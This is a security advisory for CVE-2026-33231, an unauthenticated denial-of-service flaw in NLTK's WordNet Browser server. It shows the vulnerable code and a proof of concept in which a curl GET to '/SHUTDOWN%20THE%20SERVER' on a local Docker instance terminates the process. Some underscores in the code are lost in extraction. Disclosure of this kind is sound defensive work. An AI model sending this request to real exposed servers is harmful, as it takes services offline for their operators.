PT-2026-26299 · Pypi · Nltk

Published

2026-03-19

·

Updated

2026-03-19

·

CVE-2026-33231

CVSS v3.1

7.5

High

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

nltk.app.wordnet app allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple GET /SHUTDOWN%20THE%20SERVER request causes the process to terminate immediately via os. exit(0), resulting in a denial of service.

Details

The vulnerable logic is in nltk/app/wordnet app.py:
  • [nltk/app/wordnet app.py:242](/mnt/Data/my brains/test/nltk/nltk/app/wordnet app.py#L242)
  • The server listens on all interfaces:
  • server = HTTPServer(("", port), MyServerHandler)
  • [nltk/app/wordnet app.py:87](/mnt/Data/my brains/test/nltk/nltk/app/wordnet app.py#L87)
  • Incoming requests are checked for the exact path:
  • if unquote plus(sp) == "SHUTDOWN THE SERVER":
  • [nltk/app/wordnet app.py:88](/mnt/Data/my brains/test/nltk/nltk/app/wordnet app.py#L88)
  • The shutdown protection only depends on server mode
  • [nltk/app/wordnet app.py:93](/mnt/Data/my brains/test/nltk/nltk/app/wordnet app.py#L93)
  • In the default mode (runBrowser=True, therefore server mode=False), the handler terminates the process directly:
  • os. exit(0)
This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.

PoC

  1. Start the WordNet Browser in Docker in its default mode:
docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 
 nltk-sandbox 
 python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet app import wnb; wnb(8004, True)"
  1. Confirm the service is reachable:
curl -s -o /tmp/wn before.html -w '%{http code}
' 'http://127.0.0.1:8004/'
Observed result:
200
  1. Trigger shutdown:
curl -s -o /tmp/wn shutdown.html -w '%{http code}
' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'
Observed result:
000
  1. Verify the service is no longer available:
curl -s -o /tmp/wn after.html -w '%{http code}
' 'http://127.0.0.1:8004/'
docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}t{{.Status}}'
docker logs nltk-wordnet-web-default-retest
Observed results:
000
nltk-wordnet-web-default-retest  Exited (0)
Server shutting down!

Impact

This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.
Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:
  • the route is accessible over HTTP
  • no authentication or CSRF-style confirmation is required
  • the server listens on all interfaces by default
  • the process exits immediately instead of performing a controlled shutdown
This primarily affects users who run nltk.app.wordnet app and expose or otherwise allow access to its listening port.

Fix

Missing Authentication

Weakness Enumeration

CWE-306

Related Identifiers

CVE-2026-33231
GHSA-JM6W-M3J8-898G

Affected Products

Nltk